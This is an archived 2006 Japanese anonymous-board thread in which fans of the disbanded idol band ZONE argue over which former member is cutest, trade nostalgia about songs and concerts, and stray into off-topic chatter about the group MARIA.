MAIKO.リスの様な顔で万人向けじゃない、でも、そこら辺の一般人よりは可愛いと思う
TOMOKA.武道館では太ってたが唯一顔に悪い所が見つからない。


こんな感じだなでも、この前のクリスタルのMIYUとMAIKOは可愛かったよ。

345 :通行人さん@無名タレント:2006/12/27(水) 20:51:07 ID:KdUDx5W+
武道館のTOMOKA太ってたな

346 :通行人さん@無名タレント:2006/12/27(水) 21:15:14 ID:QAOf+kOY
顔だけじゃなく歌的には誰が万人受け?

347 :通行人さん@無名タレント:2006/12/27(水) 21:59:40 ID:suSACA4R
>>346
だれか一人でも万人受けしていれば、バンド存続しているなり
解散しても、その子は今でもピンでやってるんじゃね?

348 :通行人さん@無名タレント:2006/12/27(水) 22:02:59 ID:7YKcj1/I
>>347
それはいえてる

349 :通行人さん@無名タレント:2006/12/27(水) 22:13:48 ID:QAOf+kOY
>>347
確かにそうだけど売り出し方によっては少しは売れるんじゃ

350 :通行人さん@無名タレント:2006/12/27(水) 23:01:37 ID:H7jzMdfW
ttp://www.byonavi.com/ado/html/idol.html
この画像の宮崎あおいの口元が昔のMIYUの口元に似てる気がしない?
あのつり上がった?口元が好きな漏れ・・・

351 :通行人さん@無名タレント:2006/12/27(水) 23:06:37 ID:KdUDx5W+
俺はツルブル〜武道館のMIYUが好きだった

352 :通行人さん@無名タレント:2006/12/27(水) 23:19:38 ID:MHjKoywH
要するに顔の趣味は人それぞれでFA?

353 :通行人さん@無名タレント:2006/12/28(木) 00:19:57 ID:A2BVepLe
ここまでの流れをまとめると、
MAIKOが一番かわいいということでOKか?

354 :通行人さん@無名タレント:2006/12/28(木) 00:31:52 ID:0t5IQpu1
このスレの最初の方だとTOMOKAも多いし
人それぞれってことで良いんじゃね?
特別不細工なのがいるわけでもないし好みの問題だな

355 :通行人さん@無名タレント:2006/12/28(木) 00:34:59 ID:WuP/xmCl
だれが一番なんて決めなくていいよ

356 :通行人さん@無名タレント:2006/12/28(木) 00:36:56 ID:2zyoaMxI
>>318

MIYU=ZONEてことはないだろ。
他にMAIKOやMIZUHOやTAKAYO、TOMOKAがいて、
初めてZONEだと思うのだが・・・。

辞めようとしたからZONEじゃないとか途中から入ってきたからとか、
途中で抜けたからとかどうでもいいし!

357 :通行人さん@無名タレント:2006/12/28(木) 00:39:17 ID:DMwHkuYl
>>356
いいこと言った

358 :通行人さん@無名タレント:2006/12/28(木) 00:51:56 ID:OGKbTpPR
みんなそろってZONEだよね。
人々はZONE=MIYUと思いがちだしね。ZONE≠MIYU

359 :通行人さん@無名タレント:2006/12/28(木) 01:32:16 ID:QPqiybR2
>>356-358
お前ら最高だ

俺はMIZUHO好きだけど、皆嫌いなのか…

360 :通行人さん@無名タレント:2006/12/28(木) 01:33:55 ID:DMwHkuYl
みじゅほ大好き

361 :通行人さん@無名タレント:2006/12/28(木) 01:40:39 ID:v0EluhE4
みゆオタだけどみずほ好きだぞ

362 :通行人さん@無名タレント:2006/12/28(木) 02:03:57 ID:vdZ87iwe
いつも君の側にいるよ
だからもう一人じゃない

363 :通行人さん@無名タレント:2006/12/28(木) 02:58:47 ID:OGKbTpPR
そこのフレーズ好きだ。
ツルブルは中1の時に野外活動で歌ったなー

364 :通行人さん@無名タレント:2006/12/28(木) 02:59:56 ID:+fupPLfA
>>362
↑ただ、こぅ言ぅのは軽くひく

365 :通行人さん@無名タレント:2006/12/28(木) 03:14:50 ID:QPqiybR2
ZONEは解散してから聴くようになったから、アトムでツルブル流れてた当時は名前しか知らなかったな、ZONE

クラスにMIZUHOに似てる子がいたからそういう事でしか意識してなかったw

366 :通行人さん@無名タレント:2006/12/28(木) 03:20:30 ID:+FEAaNqV
ということはお前はそのクラスの子が好きだったんだな

367 :通行人さん@無名タレント:2006/12/28(木) 03:32:05 ID:vT5yBnsA
呼んだ?

368 :通行人さん@無名タレント:2006/12/28(木) 03:45:04 ID:QPqiybR2
>>366
今も好きだよ
高校卒業したら繋がりはメールだけか…

…変な流れ作っちゃった すまそ

369 :通行人さん@無名タレント:2006/12/28(木) 03:51:26 ID:OGKbTpPR
学校にマイコ激似の子がいる
まぁ俺はTOMOKA1本だかw

370 :通行人さん@無名タレント:2006/12/28(木) 04:06:33 ID:1BpYrxS9
>>369
>学校にマイコ激似の子がいる
いいなぁ リス顔のスレンダー娘

天然のままなら
MAIKO似、まんま宮崎アニメキャラヒロイン

胸を大きくしたら
ほしのあき似、28才にして国民的オナドール

どちらにせよ、日本人の好みど真ん中の美少女

371 :通行人さん@無名タレント:2006/12/28(木) 05:57:36 ID:w2GkOjdJ
TAKAYOは辞めたのではなく、辞めさせられたんだよ。
アイドル路線に変更するために。
歳の問題で。

372 :通行人さん@無名タレント:2006/12/28(木) 07:24:48 ID:1BpYrxS9
ZONEの部屋 >> SAKAE MAIKO 舞衣子
ttp://www.viezone.org/redirect.php?tid=2796&goto=lastpost

373 :通行人さん@無名タレント:2006/12/28(木) 07:48:03 ID:NmrjqVOr
違う。ふけ顔とキツい性格のせいですね。

374 :通行人さん@無名タレント:2006/12/28(木) 11:41:25 ID:TxXASOnk
しんよんって兵庫のどこ?

375 :通行人さん@無名タレント:2006/12/28(木) 13:21:24 ID:SwKCF4nh


376 :通行人さん@無名タレント:2006/12/28(木) 13:38:52 ID:NmrjqVOr


377 :通行人さん@無名タレント:2006/12/28(木) 14:06:32 ID:DMwHkuYl
HIGH−JUMPで
中島富雄って馬鹿?悩める男(しんよん)にレスしてらwww

378 :通行人さん@無名タレント:2006/12/28(木) 15:17:58 ID:NmrjqVOr
それにしてもTOMOKAは可愛いな。

MAIKOみたいな野良リスやMIYUみたいな巨人好きの巨顔とは比べモノにならない。
MIZUHOは論外ブスだし。

379 :通行人さん@無名タレント:2006/12/28(木) 15:21:07 ID:+B6abVhy
TOMOKAだよね。やっぱり
MAIKOみたいに先走って失敗するより下で地道にコツコツとがんばって!TOMOKA
いや西村朝香!!そして這い上がってくるんだ!Zのように!!!

380 :通行人さん@無名タレント:2006/12/28(木) 16:12:31 ID:NmrjqVOr
やっぱりTOMOKAだね♪
人気NO1だったTOMOKA最高です!

381 :通行人さん@無名タレント:2006/12/28(木) 16:18:58 ID:k8hO55Ej
TOMOKAヲタはTOMOKAが一番人気があったり可愛いと思う傾向があるようだな

382 :通行人さん@無名タレント:2006/12/28(木) 16:19:49 ID:SwKCF4nh
TOMOKAの歌唱力を一般人にしとくのはもったいない

383 :通行人さん@無名タレント:2006/12/28(木) 16:20:31 ID:SwKCF4nh
>>381
MAIKOヲタもね

384 :通行人さん@無名タレント:2006/12/28(木) 16:30:09 ID:V5lCz9GH
MIZUHO可愛いよ瑞穂

385 :通行人さん@無名タレント:2006/12/28(木) 16:58:39 ID:+B6abVhy
TOMOKAの方がカワイイのに気づかないマイコヲタ

386 :通行人さん@無名タレント:2006/12/28(木) 17:51:17 ID:HaTmYSbc
こんなページがまだあったのねw
ttp://www.sonymusic.co.jp/Music/Info/ZONE/backnumber/

387 :通行人さん@無名タレント:2006/12/28(木) 18:37:14 ID:3vvx9Lgl
世間から見たら
みゆ>>>ともか>>>みずほ>>>まいこ>>>たかよ では?

388 :通行人さん@無名タレント:2006/12/28(木) 18:43:01 ID:SwKCF4nh
辞めようと思った人は新バンド。
女の子って恐い。

389 :通行人さん@無名タレント:2006/12/28(木) 19:29:35 ID:zzknaRvO
TOMOKAが一番かわいい

390 :通行人さん@無名タレント:2006/12/28(木) 20:02:43 ID:NmrjqVOr
>>387プッ論外ブスのみずほが3位w

常識的に考えてTOMOKA>>>>>>>>>>>MAIKO>>MIYU>>>>>>TAKAYO




論外みずほ

391 :通行人さん@無名タレント:2006/12/28(木) 20:36:21 ID:SwKCF4nh
>>397
世間から見たら>>387じゃない?

392 :通行人さん@無名タレント:2006/12/28(木) 20:37:12 ID:SwKCF4nh
間違えた>>390

393 :通行人さん@無名タレント:2006/12/28(木) 20:41:47 ID:z+eNrjFQ
はいはいわろすわろす
くずほは論外だからね
漏れ的には
TOMOKA>>>>>>>>>>MAIKO>>>>>>>>>>MIYU

論外 くずほ=ばばよ

394 :通行人さん@無名タレント:2006/12/28(木) 20:42:45 ID:3JFTZUDH
女の子はみんな可愛い

395 :通行人さん@無名タレント:2006/12/28(木) 21:00:06 ID:NmrjqVOr
>>393分かってるじゃないか!
君とは意見が合うな。

396 :通行人さん@無名タレント:2006/12/28(木) 21:22:29 ID:DHDKBvcJ
来年就職だからいろいろ整理してるんだけど、GPがなかなか処分できない。
ほかの雑誌は切り取って捨てたんだけど、どうしようかなぁ

397 :通行人さん@無名タレント:2006/12/28(木) 22:08:49 ID:vT5yBnsA
>>396
俺も来年就職だが、なぜ捨てる必要がある?

398 :通行人さん@無名タレント:2006/12/28(木) 22:16:53 ID:DHDKBvcJ
>>397
寮に移ることになったからさ。
久しぶりに帰ったら、こんなの残ってたんだ的なことはたぶんうちにはない。
だからツアーグッズもどうしようかと思って

399 :通行人さん@無名タレント:2006/12/28(木) 22:20:43 ID:OGKbTpPR
んなら俺がもらうわ

400 :通行人さん@無名タレント:2006/12/28(木) 22:24:03 ID:vT5yBnsA
ZONEを忘れるのか?

401 :通行人さん@無名タレント:2006/12/29(金) 00:18:06 ID:ZgEEaEqW
鈴井貴之プロデュースでZONE再結成希望。
オフィスキューアーティスト部門から再デビュー希望

402 :通行人さん@無名タレント:2006/12/29(金) 00:26:13 ID:gWcqRfPD
ちょw
ミスターww

403 :通行人さん@無名タレント:2006/12/29(金) 00:43:37 ID:Ks76CTEN
>>402
MIZUHOがいるからきっと大丈夫。

404 :通行人さん@無名タレント:2006/12/29(金) 02:49:21 ID:mawqQkIV
大丈夫じゃないよ

405 :通行人さん@無名タレント:2006/12/29(金) 04:53:25 ID:fqMLvqU+
は?大丈夫だよ

406 :通行人さん@無名タレント:2006/12/29(金) 07:59:29 ID:l0aTUI/X
は?大丈夫じゃないよ

407 :通行人さん@無名タレント:2006/12/29(金) 11:09:58 ID:26o/YqxH
なにが大丈夫なんだよ

408 :通行人さん@無名タレント:2006/12/29(金) 12:46:03 ID:exnOnYUL
ここまでの流れをまとめると、
MARIAの新曲また惨敗ということでOKか?

409 :通行人さん@無名タレント:2006/12/29(金) 12:54:20 ID:HPYO0iES
>>408
スレチ乙

410 :通行人さん@無名タレント:2006/12/29(金) 12:54:59 ID:TN+8taSn
>>408
アニメのほうの人気は知らんが,新曲は小さな詩みたいな感じだよ。
でも全然宣伝しないし今回も危ないな…

411 :通行人さん@無名タレント:2006/12/29(金) 13:06:04 ID:HPYO0iES
>>410
ていうかdokidokiだぞ、夏のライブ行ったんならわかるだろ。
まああんな糞曲1000枚売れればいいほうかな。
漏れは最低5枚は買うがな。
ていうかスレチだっつってんだろ。

412 :通行人さん@無名タレント:2006/12/29(金) 13:37:49 ID:0uVD/O51
MiyuもMARIAに入っちゃえ

413 :通行人さん@無名タレント:2006/12/29(金) 13:38:33 ID:3OS7RVZD
そんなのやめてほしいわ

414 :通行人さん@無名タレント:2006/12/29(金) 14:28:07 ID:JgKsug1C
MARIAうpスレ入ったらトロイ・・・びびったわw

415 :通行人さん@無名タレント:2006/12/29(金) 14:33:06 ID:Kue32Wq0
武道館DVDのバックステージドキュメントで朝香が泣き出したのにはグッとくる…

416 :通行人さん@無名タレント:2006/12/29(金) 14:43:32 ID:fqMLvqU+
今日本当の好きな人から「前から気になってました」ってメールが来て、やったー!!って思ってたら、夢だった。


これからも一生ZONEを愛していきます

417 :通行人さん@無名タレント:2006/12/29(金) 15:20:07 ID:pAFTCjhP
朝香って骨太で肩幅あってビルダーみたいにでかいもんね


418 :通行人さん@無名タレント:2006/12/29(金) 15:21:27 ID:pAFTCjhP
TOMOKAみたいにたくましい肉体に生まれたかったyo
あはは

419 :通行人さん@無名タレント:2006/12/29(金) 15:32:54 ID:vn7o2CGc
みゆとともかで新ユニットでも組めば良いのに

420 :通行人さん@無名タレント:2006/12/29(金) 16:49:24 ID:guWKbmli
つぐみがやってるバンドに混ぜてもらえば?w

421 :通行人さん@無名タレント:2006/12/29(金) 16:56:49 ID:mawqQkIV
トモカの二の腕よかったなーw

422 :通行人さん@無名タレント:2006/12/29(金) 19:42:50 ID:y3BU4xnh
TOMOKAだけ噂無いよね。何やってんだろ?
カムバック!!!TOMOKA−−!!!!!

423 :通行人さん@無名タレント:2006/12/29(金) 19:51:44 ID:26o/YqxH
てれ朝シクベキタ―――!!

424 :通行人さん@無名タレント:2006/12/29(金) 19:52:01 ID:gWcqRfPD
シクベきたああああああああああああああ

425 :通行人さん@無名タレント:2006/12/29(金) 19:53:07 ID:bsMWmdU7
2002年カラオケ人気No.2ソングにシクベ

426 :通行人さん@無名タレント:2006/12/29(金) 19:54:09 ID:RHeZBQAn
やはりだったね

427 :通行人さん@無名タレント:2006/12/29(金) 19:54:49 ID:gWcqRfPD
まだ来るかな
カラオケランキングはよくわからん。

428 :通行人さん@無名タレント:2006/12/29(金) 19:57:06 ID:gWcqRfPD
もう無理か
2004でグロカラ来なきゃもう笑顔日和はきついな

429 :通行人さん@無名タレント:2006/12/29(金) 19:57:30 ID:c+3R9ao8
思い出の紅白はスルー?

430 :通行人さん@無名タレント:2006/12/29(金) 19:58:03 ID:cs1yKaJt
ともかちゃんが一番かわいい

431 :通行人さん@無名タレント:2006/12/29(金) 20:12:27 ID:fzmHCUxo
栄 舞子
長瀬実夕
西村朝香
斎藤瑞穂
大越デブ代


432 :通行人さん@無名タレント:2006/12/29(金) 20:20:50 ID:X3HRlyQH
>>431
小学生並みだぞ・・・

433 :通行人さん@無名タレント:2006/12/29(金) 20:24:47 ID:HPYO0iES
アンチほど実はヲタなんだよww
こいつもおそらくババヨファンww
かくいう漏れもババヨふぁんwww

434 :通行人さん@無名タレント:2006/12/29(金) 22:25:50 ID:gWcqRfPD
まいちんクリスタルについて全く触れなかったな

435 :通行人さん@無名タレント:2006/12/29(金) 23:02:04 ID:guWKbmli
CasinoKatって何者よ?

436 :通行人さん@無名タレント:2006/12/30(土) 00:03:12 ID:TN+8taSn
>>434
ラジオのコメントでは言ってた。その投稿者はいかにも読まれやすそうな整った文章と構成で内容もいいし,読まれて不思議はないと思うのだが,気持ち悪いヲタ丸出しの香具師が読まれてるのは聞いてて腹が立つし納得がいかん。

437 :通行人さん@無名タレント:2006/12/30(土) 02:24:15 ID:aJ8e1Qkh
>>436
先週の投稿者って知り合いだけど高校1年生だぞw文章構成は大人のほうがいいんジャマイカ?
まぁ大人でもイタイ内容とかどうでもいいようなこと投稿してるヤシいるけどな…


438 :通行人さん@無名タレント:2006/12/30(土) 05:04:39 ID:ZBC9nJLK
べっちょしか入ってないよ。ちょっとこれまけてよ あらま

76 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)